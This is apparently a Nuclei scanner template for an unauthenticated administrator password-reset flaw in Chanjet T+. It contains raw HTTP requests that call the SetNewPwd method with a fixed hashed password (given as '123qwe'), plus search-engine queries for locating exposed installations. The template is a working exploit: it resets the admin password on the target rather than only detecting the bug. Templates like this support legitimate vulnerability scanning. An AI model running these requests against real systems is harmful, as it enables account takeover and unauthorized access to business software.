id: changjet-tplus-recoverpassword
info:
  name: 畅捷通 T+ RecoverPassword.aspx - 管理员密码重置漏洞
  author: leadlife
  severity: high
  description: 用友畅捷通 T+ RecoverPassword.aspx 存在未授权管理员密码修改漏洞，攻击者可以通过漏洞修改管理员账号密码登录后台
  reference:
    - https://www.cnblogs.com/pursue-security/p/17684749.html
  metadata:
    verified: true
    hunter-query: app.name="畅捷通 T+"
    fofa-query: icon_hash="-2067519629" || app="畅捷通-TPlus"
    tips: pass is 123qwe
  tags: changjet,tplus,resetpass
  
http:
  - raw:
      - |
        GET /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx HTTP/1.1
        Host: {{Hostname}}
      
      - |
        POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Content-Length: 42

        {"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body_1,"pwdNew","SetNewPwd")'
          - 'contains(body_2,"true")'
        condition: and